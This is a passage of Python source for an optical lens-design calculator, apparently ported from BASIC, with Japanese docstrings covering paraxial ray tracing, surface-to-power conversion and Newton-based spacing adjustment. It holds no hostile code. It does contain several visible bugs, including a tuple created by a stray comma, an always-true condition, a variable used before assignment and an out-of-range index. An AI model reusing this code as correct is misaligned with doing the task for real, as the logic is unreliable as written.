self.split_param2[grp_no]\n v_f = self.grp_val[grp_no]\n v_g = self.grp_inr[grp_no]\n if self.split_pattern[grp_no] == SplitPattern.FIRST_INTERVAL:\n pow_inr.append(v_g - v_v * (v_f - v_u) /\n (1 - v_u * v_v) / v_f - delta)\n pow_val.append(v_u)\n pow_inr.append(v_v)\n pow_val.append((v_f - v_u) / (1 - v_u * v_v))\n elif self.split_pattern[grp_no] == SplitPattern.LAST_INTERVAL:\n pow_inr.append(v_g - (v_u * v_v) / v_f - delta)\n pow_val.append((v_f - v_u) / (1 - v_u * v_v))\n pow_inr.append(v_v)\n pow_val.append(v_u)\n elif self.split_pattern[grp_no] == SplitPattern.RATIO_INTERVAL:\n pow_inr.append(v_g - v_v * v_u / v_f * fn_p(v_u, v_f, v_v)\n - delta)\n pow_val.append(fn_p(v_u, v_f, v_v))\n pow_inr.append(v_v)\n pow_val.append(v_u * fn_p(v_u, v_f, v_v))\n elif self.split_pattern[grp_no] == SplitPattern.FIRST_LAST:\n pow_inr.append(v_g - (v_u + v_v - v_f) / v_v - delta)\n pow_val.append(v_u)\n pow_inr.append((v_u + v_v - v_f) / v_u / v_v)\n pow_val.append(v_v)\n delta = pow_val[pow_no] * pow_inr[pow_no + 1] / v_f\n pow_no += 2\n self.pow_inr = overwrite(self.pow_inr, pow_inr)\n self.pow_val = overwrite(self.pow_val, pow_val)\n self.pow_inr_0 = self.pow_inr[0]\n\n def determine_vals(self):\n \"\"\"\n lens_eff_radからhole_valueを\n lens_radとap_radからmax_radを\n それぞれ決定する\n 対応するBASICコード:*IN6\n 
\"\"\"\n hole_value_pv = self.lens_eff_rad[self.no_lenses * 2 - 1]\n if (self.tracing_dir == TracingDirection.SCREEN_TO_APERTURE_EXT and\n hole_value_pv < self.lens_rad[self.no_lenses - 1]):\n self.hole_value = hole_value_pv**2\n else:\n self.hole_value = 0\n self.max_rad = max(self.lens_rad + [self.ap_rad])\n\n def determine_kind_of_lens(self):\n \"\"\"\n 光学系の構成要素の種類を順に決定し、kind_of_lensリストに格納する\n 対応するBASICコード:*DRV\n \"\"\"\n lens_index = []\n surf_eff_rad = []\n kind_of_lens = []\n surf_no = 0\n lens_no = 0\n for pow_no in range(self.no_pows):\n if self.adj_surf_inr == 0 and self.adj_pow_inr == pow_no:\n self.adj_surf_inr = surf_no\n if self.adj_pow_inr == 0 and self.adj_surf_inr == surf_no:\n self.adj_pow_inr = pow_no\n no_surfs = self.surfs_of_pow[pow_no]\n for surf in range(no_surfs):\n lens_index.append(lens_no)\n if self.is_air(surf_no + surf) and self.is_air(\n surf_no + surf + 1):\n if (self.direction[surf_no + surf].value ==\n -self.direction[surf_no + surf + 1].value):\n kind_of_lens.append(KindOfLens.REFLECTOR)\n elif (lens_no == self.no_lenses - 1 and self.tracing_dir ==\n TracingDirection.SCREEN_TO_APERTURE_EXT) or (\n surf_no + surf == 0 and self.surf_inr[0] < 0 and\n (self.tracing_dir == TracingDirection.\n SOURCE_TO_APERTURE or self.tracing_dir ==\n TracingDirection.SOURCE_TO_APERTURE_EXT)):\n kind_of_lens.append(KindOfLens.LS_REFLECTOR)\n else:\n kind_of_lens.append(KindOfLens.IRIS)\n self.surf_roc[surf_no + surf] = 0\n self.axis_ratio[surf_no + surf] = 1\n surf_eff_rad.append(self.lens_eff_rad[lens_no * 2])\n lens_no += 1\n elif self.is_air(surf_no +\n surf) and not self.is_air(surf_no + surf + 1):\n kind_of_lens.append(KindOfLens.SINGLE_LENS)\n surf_eff_rad.append(self.lens_eff_rad[lens_no * 2])\n lens_no += 1\n elif not self.is_air(surf_no + surf) and not self.is_air(\n surf_no + surf + 1):\n kind_of_lens[-1] = KindOfLens.COMBINED_LENS_FRONT\n kind_of_lens.append(KindOfLens.COMBINED_LENS_BACK)\n surf_eff_rad.append(\n min(self.lens_eff_rad[lens_no * 2 - 1],\n self.lens_eff_rad[lens_no * 2]))\n lens_no += 1\n else:\n surf_eff_rad.append(self.lens_eff_rad[lens_no * 2 - 1])\n if (no_surfs == 1 or\n (no_surfs == 2 and self.rindex[surf_no + 1] == 1) or\n (no_surfs == 3 and\n self.rindex_diff[surf_no] * self.rindex_diff[surf_no +\n 2] == 0)):\n self.div_ratio[pow_no] = 0\n surf_no = surf_no + no_surfs\n if surf_no != self.no_surfs or lens_no != self.no_lenses:\n raise DataConsistenceError(\n \"Number of surfaces/lenses doesn't match.\")\n if self.tracing_dir == TracingDirection.SCREEN_TO_APERTURE_EXT:\n kind_of_lens.append(KindOfLens.APERTURE)\n elif (self.tracing_dir == TracingDirection.SOURCE_TO_APERTURE or\n self.tracing_dir == TracingDirection.SOURCE_TO_APERTURE_EXT):\n kind_of_lens.append(KindOfLens.LIGHT_SOURCE)\n kind_of_lens.append(KindOfLens.APERTURE)\n self.lens_index = overwrite(self.lens_index, lens_index)\n self.surf_eff_rad = overwrite(self.surf_eff_rad, surf_eff_rad)\n self.kind_of_lens = overwrite(self.kind_of_lens, kind_of_lens)\n self.surf_inr_0 = self.surf_inr[0]\n self.surf_eff_rad_0 = self.surf_eff_rad[0]\n\n def set_obj_dist(self):\n \"\"\"\n 計算対象の物体距離等を設定する\n 対応するBASICコード:*LSET\n \"\"\"\n if self.inr_adj == IntervalAdjustment.FOCAL_POSITION_SEPARATED:\n self.obj_dist_real = self.obj_dist_lst[self.dist_index]\n if (self.input_dtype != InputDataType.SURFACE and\n self.input_dtype != InputDataType.POWER or\n self.inr_adj != IntervalAdjustment.NONE) and (\n self.obj_dist_spc == ObjectDistance.INFINITY or\n self.obj_dist_spc == ObjectDistance.FIRST_POWER):\n 
self.obj_dist = self.pow_inr_0 * self.rindex_sgd_0\n else:\n self.obj_dist = self.obj_dist_real / self.scale\n\n def calculate_inv(self):\n \"\"\"\n 収差の計算に用いる逆行列を算出する\n 対応するBASICコード:*IN5\n \"\"\"\n CAL_POINTS = [.4, .6, .8, 1, 1.05],\n CAL_POINTS_EQUAL_AREA = [.020, .316, .548, .707, .837, .949, 1]\n\n self.inv = {}\n tmp = []\n for index in range(4, 17, 2):\n tmp.append(sum([e**index for e in CAL_POINTS]))\n self.inv['even'] = np.linalg.inv(\n np.matrix([[tmp[i + j] for i in range(3)] for j in range(3)]))\n tmp = []\n for index in range(2, 11):\n tmp.append(sum([e**index for e in CAL_POINTS[::-1] + CAL_POINTS]))\n self.inv['odd'] = np.linalg.inv(\n np.matrix([[tmp[i + j] for i in range(4)] for j in range(4)]))\n tmp = []\n for index in range(4, 17, 2):\n tmp.append(sum([e**index for e in CAL_POINTS_EQUAL_AREA]))\n self.inv['equal_area'] = np.linalg.inv(\n np.matrix([[tmp[i + j] for i in range(3)] for j in range(3)]))\n\n def convert_surf_to_pow(self):\n \"\"\"\n 屈折面データから、パワーデータへの変換を行う\n 対応するBASICコード:*EFG\n \"\"\"\n pow_inr = []\n pow_val = []\n surf_inr_of_pow = []\n div_ratio = []\n surf_no = 0\n pow_inr_pv = self.pow_inr[0]\n for pow_no in range(self.no_pows):\n v_a = 0\n v_y = 1\n v_w = 0\n v_e_lst = []\n v_f_lst = []\n no_surfs = self.surfs_of_pow[pow_no]\n for surf in range(no_surfs):\n surf_inr_of_pow.append(self.surf_inr[surf_no + surf])\n v_e = self.surf_inr[surf_no + surf] / self.rindex_sgd[surf_no +\n surf]\n v_w = v_w + v_e / (v_y - v_e * v_a) / v_y\n v_y = v_y - v_e * v_a\n v_f = self.rindex_diff[surf_no + surf] * rev(\n self.surf_roc[surf_no + surf])\n v_a = v_a + v_y * v_f\n v_e_lst.append(v_e)\n v_f_lst.append(v_f)\n lens_no = self.lens_index[surf_no + surf]\n if (self.direction[surf_no + surf].value ==\n -self.direction[surf_no + surf + 1].value):\n self.ptlc_val[lens_no] = self.surf_roc[surf_no + surf]\n elif not self.is_air(surf_no + surf + 1):\n if self.ptlc_spc[lens_no] == PTLCSpecification.FRONT:\n self.ptlc_val[lens_no] = self.surf_roc[surf_no + surf]\n elif self.ptlc_spc[lens_no] == PTLCSpecification.BACK:\n self.ptlc_val[lens_no] = self.surf_roc[surf_no +\n surf + 1]\n elif (self.ptlc_spc[lens_no] ==\n PTLCSpecification.FRONT_OVER_BACK or\n self.ptlc_spc[lens_no] ==\n PTLCSpecification.BACK_OVER_FRONT):\n if abs(self.surf_roc[surf_no + surf + 1]) < abs(\n self.surf_roc[surf_no + surf]):\n self.ptlc_spc[\n lens_no] = PTLCSpecification.BACK_OVER_FRONT\n self.ptlc_val[lens_no] = (self.surf_roc[\n surf_no +\n surf + 1] * rev(self.surf_roc[surf_no + surf]))\n else:\n self.ptlc_spc[\n lens_no] = PTLCSpecification.FRONT_OVER_BACK\n self.ptlc_val[lens_no] = (self.surf_roc[\n surf_no +\n surf] * rev(self.surf_roc[surf_no + surf + 1]))\n elif self.is_air(surf_no + surf):\n self.ptlc_val[lens_no] = 0\n pow_val.append(v_a)\n v_a = rev(v_a)\n pow_inr.append(pow_inr_pv + (1 - 1 / v_y) * v_a + v_w)\n pow_inr_pv = (1 - v_y) * v_a\n if no_surfs == 2 and self.is_air(surf_no + 1):\n div_ratio.append(v_f_lst[1] / v_f_lst[0])\n elif no_surfs == 3:\n if self.is_air(surf_no + 1):\n div_ratio.append((v_f_lst[1] + v_f_lst[2] -\n v_e_lst[2] * v_f_lst[1] * v_f_lst[2]) *\n rev(v_f_lst[0]))\n elif self.is_air(surf_no + 2):\n div_ratio.append(v_f_lst[2] /\n (v_f_lst[0] + v_f_lst[1] -\n v_e_lst[1] * v_f_lst[0] * v_f_lst[1]))\n else:\n self.ptlc_val[self.lens_index[surf_no + 2] -\n 2] = self.surf_roc[surf_no + 1]\n if (self.direction[surf_no +\n 1].value == self.direction[surf_no +\n 2].value):\n div_ratio.append(\n -((self.rindex_sgd[surf_no +\n 2] - self.direction[surf_no + 1]\n .value) * 
rev(self.surf_roc[surf_no + 1]) *\n (1 - v_e_lst[2] * v_f_lst[2]) + v_f_lst[2]) /\n ((self.rindex_sgd[surf_no +\n 1] - self.direction[surf_no + 1].\n value) * rev(self.surf_roc[surf_no + 1]) *\n (1 - v_e_lst[1] * v_f_lst[0]) + v_f_lst[0]))\n else:\n div_ratio.append(\n -(self.rindex_sgd[surf_no + 2] * rev(\n self.surf_roc[surf_no + 1]) *\n (1 - v_e_lst[2] * v_f_lst[2]) + v_f_lst[3]) /\n (self.rindex_sgd[surf_no + 1] * rev(\n self.surf_roc[surf_no + 1]) *\n (1 - v_e_lst[1] * v_f_lst[0]) + v_f_lst[0]))\n elif no_surfs == 4:\n div_ratio.append((v_f_lst[2] + v_f_lst[3] -\n v_e_lst[3] * v_f_lst[2] * v_f_lst[3]) /\n (v_f_lst[0] + v_f_lst[1] -\n v_e_lst[1] * v_f_lst[0] * v_f_lst[1]))\n else:\n div_ratio.append(0)\n surf_no += no_surfs\n pow_inr.append(pow_inr_pv)\n\n self.pow_inr = overwrite(self.pow_inr, pow_inr)\n self.pow_val = overwrite(self.pow_val, pow_val)\n self.surf_inr_of_pow = overwrite(self.surf_inr_of_pow, surf_inr_of_pow)\n self.div_ratio = overwrite(self.div_ratio, div_ratio)\n\n if (self.obj_dist_spc == ObjectDistance.FIRST_POWER or\n self.obj_dist_spc == ObjectDistance.INFINITY and\n self.input_dtype != InputDataType.SURFACE and\n self.inr_adj != IntervalAdjustment.NONE):\n self.surf_inr[0] = (self.pow_inr_0 - self.pow_inr[0]\n ) * self.rindex_sgd[0] + self.surf_inr_0\n self.pow_inr[0] = self.pow_inr_0\n else:\n self.pow_inr_0 = self.pow_inr[0]\n\n def convert_pow_to_surf(self):\n \"\"\"\n パワーデータから、屈折面データへの変換を行う\n 対応するBASICコード:*DRG\n \"\"\"\n surf_no = 0\n cal_delta = False\n v_u_lst = []\n v_f_lst = [0, 0, 0, 0]\n for pow_no in range(self.no_pows):\n no_surfs = self.surfs_of_pow[pow_no]\n lens_no = self.lens_index[surf_no]\n v_a = self.div_ratio[pow_no]\n v_p = self.pow_val[pow_no]\n v_s = self.ptlc_spc[lens_no]\n v_r = -self.ptlc_val[lens_no]\n if (v_r != 0 and v_s == PTLCSpecification.FRONT or\n v_s == PTLCSpecification.BACK):\n v_r = -1 / v_r\n v_l_lst = []\n v_n_lst = []\n v_e_lst = []\n for surf in range(no_surfs):\n if (1 < surf and 1 < self.rindex[surf_no + surf] and\n self.surf_inr_of_pow[surf_no + surf] <= 0):\n cal_delta = True\n v_l_lst.append(self.rindex_diff[surf_no + surf])\n v_n_lst.append(self.rindex[surf_no + surf])\n v_e_lst.append(\n abs(self.surf_inr_of_pow[surf_no + surf]) /\n self.rindex_sgd[surf_no + surf])\n v_u_lst.append(abs(self.surf_inr_of_pow[surf_no + surf]))\n v_e_lst[0] = 0\n\n while True:\n lens_no = self.lens_index[surf_no]\n if no_surfs == 1:\n v_f_lst[0] = self.pow_val[pow_no]\n elif no_surfs == 2:\n if self.rindex[surf_no + 1] == 1:\n v_f_lst[0] = fn_p(self.div_ratio[pow_no],\n self.pow_val[pow_no], ED[1])\n v_f_lst[1] = v_f_lst[0] * self.div_ratio[pow_no]\n else:\n v_f_lst[0], v_f_lst[1] = fn_ps(\n v_s, v_l_lst[0], v_l_lst[1], v_p, v_e_lst[1], v_r,\n v_f_lst[0], v_f_lst[1])\n elif no_surfs == 3:\n if v_n_lst[1] == 1:\n v_p_lst, v_f_lst = fn_fc(v_l_lst, v_n_lst, v_f_lst,\n v_e_lst, [v_r, 0], [v_s, 0],\n v_p, v_a, no_surfs, 0)\n v_f_lst[0] = v_p_lst[0]\n elif v_n_lst[2] == 1:\n v_p_lst, v_f_lst = fn_fc(v_l_lst, v_n_lst, v_f_lst,\n v_e_lst, [v_r, 0], [v_s, 0],\n v_p, v_a, no_surfs, 0)\n v_f_lst[2] = v_p_lst[1]\n else:\n v_r = rev(self.ptlc_val[lens_no + 1])\n sign = math.copysign(\n 1,\n v_n_lst[0]) if v_n_lst[0] * v_n_lst[1] > 0 else 0\n v_p_lst, v_f_lst = fn_fc(v_l_lst, v_n_lst, v_f_lst,\n v_e_lst, [v_r, 0], [v_s, 0],\n v_p, v_a, no_surfs, sign)\n v_f_lst[1] = v_l_lst[1] * v_r\n elif no_surfs == 4:\n v_s2 = self.ptlc_spc[lens_no + 1]\n v_r2 = -self.ptlc_val[lens_no + 1]\n if v_r2 != 0 and v_s2 != 0:\n v_r2 = -1 / v_r2\n if v_n_lst[2] == 1:\n 
v_p_lst, v_f_lst = fn_fc(\n v_l_lst, v_n_lst, v_f_lst, v_e_lst, [v_r, v_r2],\n [v_s, v_s2], v_p, v_a, no_surfs, sign)\n else:\n raise IllegalCaseError('Surfaces in a power is ' +\n no_surfs +\n ' and midst area is Air.')\n if cal_delta == False:\n break\n\n # 中心厚計算\n for surf in range(no_surfs):\n v_b = v_q\n v_br = v_qr\n v_q = 0\n v_qr = 0\n v_f = v_f_lst[surf]\n lens_no = self.lens_index[surf_no + surf]\n if (abs(v_f) > 0.000001 and\n self.rindex_diff[surf_no + surf] != 0):\n v_q = (self.rindex_diff[surf_no + surf] / v_f /\n self.axis_ratio[surf_no + surf]**2)\n v_qr = 1 / v_q\n if (self.surf_inr_of_pow[surf_no + surf] <= 0 and\n self.rindex[surf_no + surf] > 1):\n v_h = self.lens_rad[lens_no]\n v_o = -self.surf_inr_of_pow[surf_no + surf]\n if v_o == 0:\n v_o = math.floor(1.2 * (\n v_h * self.scale)**0.7) / 10 / self.scale\n if v_qr <= v_br:\n v_x = (self.lens_rad[lens_no * 2 - 1]\n if 0 < v_b else v_h)\n v_v = (self.lens_rad[lens_no * 2]\n if 0 > v_q else v_h)\n v_o = v_o + v_b - v_b * math.sqrt(\n abs(1 - (v_x * v_br / self.\n axis_ratio[surf_no + surf - 1])**2)\n ) - v_q + v_q * math.sqrt(\n abs(1 - (v_v * v_qr / self.\n axis_ratio[surf_no + surf])**2))\n if abs(v_o - v_u_lst[surf_no + surf]) > 0.0001:\n cal_delta = True\n v_u_lst[surf_no + surf] = v_o\n v_e_lst[surf_no +\n surf] = v_o / self.rindex_sgd[surf_no + surf]\n v_a = 0\n v_y = 1\n v_w = 0\n for surf in range(no_surfs):\n v_q = v_y\n v_f = v_f_lst[surf]\n v_y = v_y - v_e_lst[surf] * v_a\n v_w = v_w + v_e_lst[surf] / v_q / v_y\n v_a = v_a + v_y * v_f\n self.surf_roc[surf_no + surf] = self.rindex_diff[\n surf_no + surf] / v_f if abs(v_f) > 0.000001 else 0\n if 1 < surf:\n self.surf_inr[surf_no + surf - 1] = self.v_u_lst[surf_no +\n surf - 1]\n v_a = rev(v_a)\n self.surf_inr[surf_no] += (\n self.pow_inr[pow_no] -\n (1 - 1 / v_y) * v_a - v_w) * self.rindex_sgd[surf_no]\n self.surf_inr[surf_no + no_surfs] = (\n v_y - 1) * v_a * self.rindex_sgd[surf_no + no_surfs]\n\n self.surf_inr_delta = self.pow_inr_0 * self.rindex_sgd_0 - self.surf_inr[0]\n if self.obj_dist_spc == ObjectDistance.FIRST_POWER or (\n self.obj_dist_spc == ObjectDistance.INFINITY and\n self.input_dtype != InputDataType.SURFACE):\n self.pow_inr_0 = self.pow_inr[0]\n self.surf_inr_0 = self.surf_inr[0]\n else:\n self.pow_inr_0 = (\n self.surf_inr_0 + self.surf_inr_delta) / self.rindex_sgd_0\n self.pow_inr[0] = self.pow_inr_0\n self.surf_inr[0] = self.surf_inr_0\n\n def adjust_lens_pos(self):\n \"\"\"\n 絞りを含むレンズ位置の修正を行う\n 対応するBASICコード:*INM\n \"\"\"\n self.adjust_pow_pos(self.inr_adj == IntervalAdjustment.FOCAL_LENGTH or\n self.obj_dist_spc == ObjectDistance.INFINITY)\n self.icn = 1\n if self.inr_adj == IntervalAdjustment.FOCAL_LENGTH:\n if self.input_dtype == InputDataType.SURFACE:\n self.adjust_surf_pos(True)\n elif self.inr_adj == IntervalAdjustment.FOCAL_POSITION:\n if (self.tracing_dir == TracingDirection.SCREEN_TO_APERTURE or\n self.tracing_dir ==\n TracingDirection.SCREEN_TO_APERTURE_EXT):\n self.adjust_surf_pos(True)\n self.surf_inr_adj0 = self.surf_inr[self.adj_surf_inr]\n if self.program_operation == ProgramOperation.NEW:\n print(\"物体無限遠で計算終了\")\n self.adjust_surf_pos(self.obj_dist_spc == ObjectDistance.INFINITY)\n elif self.inr_adj == IntervalAdjustment.TELEPHOTO_POWER_0:\n if self.input_dtype == InputDataType.SURFACE:\n self.adjust_surf_pos(\n self.obj_dist_spc == ObjectDistance.INFINITY)\n self.surf_inr[self.tel_no_surfs] = self.focal_pos - sum(\n self.surf_inr[1:self.no_surfs])\n elif self.inr_adj == IntervalAdjustment.FOCAL_POSITION_LENGTH:\n self.pkv = 
sum(self.surf_inr[2:self.adj_surf_inr - 1])\n self.adjust_surf_pos_beta(True)\n self.surf_inr_fp1 = (\n self.focal_pos - sum(self.surf_inr[2:self.no_surfs]) -\n self.rindex_sgd_prj * v_y / v_a)\n self.surf_inr[1] = self.surf_inr_fp1\n self.adjust_surf_inr()\n self.surf_inr_adj0 = self.surf_inr[self.adj_surf_inr]\n self.surf_inr_adj1 = self.surf_inr[self.adj_surf_inr + 1]\n if self.program_operation == ProgramOperation.NEW:\n print(\"物体無限遠で計算終了\")\n if self.tracing_no == TracingNumber.SINGLE:\n v_y, v_a = self.ray_tracing_surf(\n self.obj_dist_spc == ObjectDistance.INFINITY)\n self.surf_inr[1] = (\n self.focal_pos - sum(self.surf_inr[2:self.no_surfs]) -\n self.rindex_sgd_prj * v_y / v_a)\n self.adjust_surf_inr()\n elif self.inr_adj == IntervalAdjustment.FOCAL_POSITION_SEPARATED:\n if self.dist_index == 1:\n surf_inr_pv = sum(\n self.surf_inr[self.adj_surf_inr:self.adj_surf_inr_b - 1])\n self.irn = 0\n self.surf_inr[self.adj_surf_inr_b] = (\n self.focal_pos - self.focal_len - surf_inr_pv -\n self.surf_inr[self.adj_surf_inr])\n v_y, v_a = self.ray_tracing_surf(True)\n y0 = (sum(self.surf_inr[1:self.no_surfs]) +\n self.rindex_sgd_prj * v_y / v_a - self.focal_pos)\n x1 = self.surf_inr[self.adj_surf_inr]\n x0 = x1 * 1.02\n self.surf_inr[self.adj_surf_inr] = x0\n self.surf_inr[self.adj_surf_inr_b] = (\n self.focal_pos - self.focal_len - surf_inr_pv - x0)\n while True:\n v_y, v_a = self.ray_tracing_surf(True)\n y1 = (sum(self.surf_inr[1:self.no_surfs]) +\n self.rindex_sgd_prj * v_y / v_a - self.focal_pos)\n factor = 1 if 0 < self.irn and abs(y0) <= abs(y1) else 0.9\n x0, y0, x1, y1 = newton_step(x0, y0, x1, y1, factor=factor)\n self.surf_inr[self.adj_surf_inr] = x0\n self.surf_inr[self.adj_surf_inr_b] = (\n self.focal_pos - self.focal_len - surf_inr_pv - x0)\n if abs(y1) < 0.0000001:\n break\n if self.telephoto == Telephoto.TRUE:\n self.adjust_surf_pos(\n self.obj_dist_spc == ObjectDistance.INFINITY or\n self.inr_adj == IntervalAdjustment.FOCAL_POSITION_SEPARATED)\n\n def calculate_vals(self):\n \"\"\"\n 焦点距離、主点位置などを計算する\n 対応するBASICコード:*FCL\n \"\"\"\n self.surf_inr[0] = 0\n v_y, v_a, v_w = self.ray_tracing_surf_beta(0)\n v_p = (self.surf_inr[0] + self.tel_prin_pos_prj\n if self.telephoto == Telephoto.TRUE else\n sum(self.surf_inr[:self.no_surfs]))\n # T = 1 / A\n # TC = T * LNM / 100\n self.prin_pos_obj = self.rindex_sgd_0 * (1 / v_a - 1 / v_a / v_y + v_w)\n self.prin_pos_prj = v_p + self.rindex_sgd_prj * (v_y - 1) / v_a\n self.back_focus_inf = self.rindex_sgd_prj * v_y / v_a\n self.determine_base_point_pow()\n if self.obj_dist_spc == ObjectDistance.INFINITY:\n self.surf_inr_index = 0\n self.prin_pos_index = 0\n else:\n self.surf_inr_index = -1 / self.surf_inr_0\n self.prin_pos_index = -1 / (self.surf_inr_0 + self.prin_pos_obj)\n self.imaging_dist = 1 / (self.rindex_sgd_0 * self.prin_pos_index + v_a)\n self.imaging_pos = (self.surf_inr_0 + self.prin_pos_prj +\n self.imaging_dist * self.rindex_sgd_prj)\n self.back_focus = self.back_focus_inf + self.rindex_sgd_prj * (\n self.imaging_dist - 1 / v_a)\n # TC1 = FO * LNM / 100\n # TC2 = TC1 * FO / T\n if self.tracing_dir == TracingDirection.SCREEN_TO_APERTURE or TracingDirection.SCREEN_TO_APERTURE_EXT:\n self.drawing_angle = self.ap_rad / self.imaging_dist / self.rindex_sgd_0\n self.imaging_hgt = self.ap_rad\n else:\n if self.obj_dist_spc == ObjectDistance.INFINITY:\n self.drawing_angle = self.ap_rad * v_a\n else:\n self.drawing_angle = -self.ap_rad * self.prin_pos_index\n\n def determine_base_point_surf(self):\n \"\"\"\n 
投影距離のレンズ側の起点をself.obj_dist_spcの値により指定する\n 対応するBASICコード:*LOC\n \"\"\"\n if self.obj_dist_spc == ObjectDistance.PRINCIPAL_POSITION:\n self.obj_dist = self.surf_inr[0] + self.prin_pos_obj\n elif self.obj_dist_spc == ObjectDistance.INFINITY:\n self.obj_dist = self.surf_inr[0]\n else:\n self.obj_dist = self.surf_inr[0] + self.surf_inr_delta\n self.surf_inr_0 = self.surf_inr[0]\n self.pow_inr_0 = (\n self.surf_inr[0] + self.surf_inr_delta) / self.rindex_sgd_0\n self.pow_inr[0] = self.pow_inr_0\n\n def determine_base_point_pow(self):\n \"\"\"\n 投影距離のレンズ側の起点をself.obj_dist_spcの値により指定する\n 対応するBASICコード:*L1C\n \"\"\"\n if self.obj_dist_spc == ObjectDistance.PRINCIPAL_POSITION:\n self.surf_inr_0 = self.obj_dist - self.prin_pos_obj\n elif (self.obj_dist_spc == ObjectDistance.INFINITY and\n self.input_dtype == InputDataType.SURFACE\n ) or self.obj_dist_spc == ObjectDistance.FIRST_SURFACE:\n self.surf_inr_0 = self.obj_dist\n else:\n self.surf_inr_0 = self.obj_dist - self.surf_inr_delta\n self.pow_inr_0 = (\n self.surf_inr_0 + self.surf_inr_delta) / self.rindex_sgd_0\n self.surf_inr[0] = self.surf_inr_0\n self.pow_inr[0] = self.pow_inr_0\n\n def adjust_surf_inr(self):\n \"\"\"\n 調整対象の屈折面間隔の値を修正する\n 対応するBASICコード:*LDK\n \"\"\"\n if self.iris_exists():\n v_o = self.focal_pos - self.surf_inr[1] - self.pkv - self.iris_pos\n self.surf_inr[self.adj_surf_inr +\n 1] += self.surf_inr[self.adj_surf_inr] - v_o\n self.surf_inr[self.adj_surf_inr] = v_o\n\n def adjust_surf_pos(self, dist_infinity):\n \"\"\"\n 屈折面位置を修正して焦点距離を合わせる\n 対応するBASICコード:*DCL\n \"\"\"\n if (\n self.tracing_dir == TracingDirection.SOURCE_TO_APERTURE or\n self.tracing_dir == TracingDirection.SOURCE_TO_APERTURE_EXT\n ) and self.iris_pos > 0 and self.inr_adj == IntervalAdjustment.FOCAL_POSITION:\n v_y, v_a = self.ray_tracing_surf(dist_infinity)\n y0 = self.rindex_sgd_prj * v_y / v_a - self.focal_pos\n x1 = self.surf_inr[self.adj_surf_inr]\n x0 = x1 * 1.1\n self.surf_inr[self.adj_surf_inr] = x0\n self.surf_inr[self.no_surfs] = self.iris_pos - sum(\n self.surf_inr[:self.no_surfs - 1])\n while True:\n v_y, v_a = self.ray_tracing_surf(dist_infinity)\n y1 = self.rindex_sgd_prj * v_y / v_a - self.focal_pos\n x0, y0, x1, y1 = newton_step(x0, y0, x1, y1)\n self.surf_inr[self.adj_surf_inr] = x0\n self.surf_inr[self.no_surfs] = self.iris_pos - sum(\n self.surf_inr[:self.no_surfs - 1])\n if abs(y1) < 0.00001:\n break\n else:\n v_y, v_a = self.ray_tracing_surf(dist_infinity)\n y0 = (sum(self.surf_inr[1:self.no_surfs]) +\n self.rindex_sgd_prj * v_y / v_a - self.focal_pos) if (\n self.inr_adj == IntervalAdjustment.FOCAL_POSITION\n ) else v_a - self.focal_len_index\n x1 = self.surf_inr[self.adj_surf_inr]\n x0 = x1 * 1.1\n self.surf_inr[self.adj_surf_inr] = x0\n while True:\n v_y, v_a = self.ray_tracing_surf(dist_infinity)\n y1 = (sum(self.surf_inr[1:self.no_surfs]) +\n self.rindex_sgd_prj * v_y / v_a - self.focal_pos) if (\n self.inr_adj == IntervalAdjustment.FOCAL_POSITION\n ) else v_a - self.focal_len_index\n x0, y0, x1, y1 = newton_step(x0, y0, x1, y1)\n self.surf_inr[self.adj_surf_inr] = x0\n if abs(y1) < 0.00001:\n break\n if self.adj_surf_inr == 1:\n self.determine_base_point_surf()\n\n def adjust_surf_pos_beta(self, dist_infinity):\n \"\"\"\n 屈折面位置を修正して焦点距離を合わせる\n 対応するBASICコード:*DCM\n \"\"\"\n v_y, v_a = self.ray_tracing_surf(dist_infinity)\n y0 = v_a - self.focal_len_index\n x1 = self.surf_inr[self.adj_surf_inr]\n x0 = x1 * 1.1\n self.surf_inr[self.adj_surf_inr] = x0\n if self.iris_exists():\n self.surf_inr[self.adj_surf_inr +\n 1] = 
self.surf_inr[self.adj_surf_inr + 1] * 1.1\n while True:\n v_y, v_a = self.ray_tracing_surf(dist_infinity)\n y1 = v_a - self.focal_len_index\n self.cra = -(x1 - x0) / (y1 - y0)\n x0, y0, x1, y1 = newton_step(x0, y0, x1, y1)\n self.surf_inr[self.adj_surf_inr] = x0\n if self.iris_exists():\n self.surf_inr[self.adj_surf_inr +\n 1] = self.surf_inr[self.adj_surf_inr +\n 1] * x0 / x1\n if abs(y1) < 0.00001:\n break\n\n def adjust_pow_pos(self, dist_infinity):\n \"\"\"\n パワー位置を修正して焦点距離を合わせる\n 対応するBASICコード:*INM\n \"\"\"\n if (self.inr_adj == IntervalAdjustment.FOCAL_LENGTH or\n self.inr_adj == IntervalAdjustment.TELEPHOTO_POWER_0):\n v_y, v_a = self.ray_tracing_pow(dist_infinity)\n y0 = v_a - self.focal_len_index\n x1 = self.pow_inr[self.adj_pow_inr]\n x0 = x1 * 1.1\n self.pow_inr[self.adj_pow_inr] = x0\n while True:\n v_y, v_a = self.ray_tracing_pow(dist_infinity)\n y1 = v_a - self.focal_len_index\n x0, y0, x1, y1 = newton_step(x0, y0, x1, y1)\n self.pow_inr[self.adj_pow_inr] = x0\n if abs(y1) < .00001:\n break\n if self.inr_adj == IntervalAdjustment.TELEPHOTO_POWER_0:\n self.pow_inr.append(self.focal_pos -\n sum(self.pow_inr[1:self.no_surfs]))\n if self.input_dtype == InputDataType.SURFACE:\n self.convert_surf_to_pow()\n else:\n self.convert_pow_to_surf()\n self.determine_base_point_pow()\n\n def ray_tracing_surf(self, dist_infinity):\n \"\"\"\n 屈折面データを用いて近軸光線追跡\n 対応するBASICコード:*PRT\n \"\"\"\n r_y = 1 if dist_infinity else 0\n r_a = 0 if dist_infinity else 1\n for index in range(self.tel_no_surfs if self.inr_adj ==\n IntervalAdjustment.TELEPHOTO_POWER_0 else\n self.no_surfs):\n r_y -= r_a * self.surf_inr[index] / self.rindex_sgd[index]\n r_a += r_y * self.rindex_diff[index] * rev(self.surf_roc[index])\n return r_y, r_a\n\n def ray_tracing_surf_beta(self, a_a):\n \"\"\"\n 屈折面データを用いて近軸光線追跡\n r_wも計算する\n 対応するBASICコード:*PR0 など\n \"\"\"\n r_y1 = 1 if a_a == 0 else 0\n r_a = a_a\n r_w = 0\n r_y0 = 1\n for index in range(self.no_surfs):\n r_y1 -= r_a * self.surf_inr[index] / self.rindex_sgd[index]\n r_a += r_y1 * self.rindex_diff[index] * rev(self.surf_roc[index])\n r_w += self.surf_inr[index] / self.rindex_sgd[index] / r_y0 / r_y1\n r_y0 = r_y1\n if self.telephoto == Telephoto.TRUE:\n r_y1 -= r_a * (\n self.tel_prin_pos_obj - 